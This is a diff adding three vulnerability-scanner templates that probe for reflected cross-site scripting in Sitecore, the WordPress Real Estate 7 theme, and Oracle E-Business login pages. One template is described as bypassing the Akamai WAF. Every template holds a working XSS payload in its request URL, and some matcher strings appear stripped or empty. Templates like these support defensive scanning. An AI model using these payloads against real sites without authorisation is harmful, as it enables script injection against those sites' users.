+++ b/poc/xss/sitecore-xml-xss.yaml
@@ -0,0 +1,39 @@
+id: sitecore-xml-xss
+
+info:
+  name: SiteCore XML Control Script Insertion
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack – more can be achieved with these XML Controls
+  reference: |
+    - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
+    - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
+  metadata:
+    verified: "true"
+    max-request: 1
+    shodan-query: html:"Sitecore"
+  tags: xss,sitecore,cms
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ""
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a00473045022050a33d1e8d168b7a9ba886b1f58923cc292c3a53bc0d5c3eab7fa010ac80a5a4022100c2f3d55ef7064d8b24c06eecf38ee7308b5f5d8c5b18284c03fca9553631f311:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/wp-real-estate-xss.yaml b/poc/xss/wp-real-estate-xss.yaml
new file mode 100644
index 0000000000..812d486da6
--- /dev/null
+++ b/poc/xss/wp-real-estate-xss.yaml
@@ -0,0 +1,37 @@
+id: wp-real-estate-xss
+
+info:
+  name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
+  author: Harsh
+  severity: medium
+  description: |
+    The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39344
+    - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
+    - https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/themes/realestate-7/"
+  tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "")'
+          - 'contains(body, "/wp-content/themes/realestate-7/")'
+        condition: and
+
+# digest: 4a0a0047304502206c539003b913a5aa84666f731c82c96bb3aec3f8fe23d82ea49a4f605525ecba022100de91aaf7c5e02ad1c794895f6017562d5a314e1fd3bf1e877253019f285191b3:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/xss-oracle.yaml b/poc/xss/xss-oracle.yaml
new file mode 100644
index 0000000000..10c054b913
--- /dev/null
+++ b/poc/xss/xss-oracle.yaml
@@ -0,0 +1,22 @@
+id: xss-oracle
+
+info:
+  name: XSS Vulnerability with bypass Akamai WAF 8/11/2024
+  author: 111xnagashy
+  severity: Medium
+  description: This template checks for an XSS vulnerability in the hidden input field where the 'oncontentvisibilityautostatechange' attribute is used full payload "\">".
+  tags: xss, WAF bypass, oa_html
+
+requests:
+  - method: GET
+    path: 
+      - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?username=ttttttttttt\">ttttttttttttttttt"
+      - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt"
+      - "{{BaseURL}}/OA_HTML/ibeCAcpCustomLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt"
+      - "{{BaseURL}}/OA_HTML/custibeCAcdPwdAssist.jsp?email=ttttttttttt\">ttttttttttttttttt"
+    redirects: false
+    matchers:
+      - type: word
+        words:
+          - "ttttttttttt\">ttttttttttttttttt"
+        part: body
\ No newline at end of file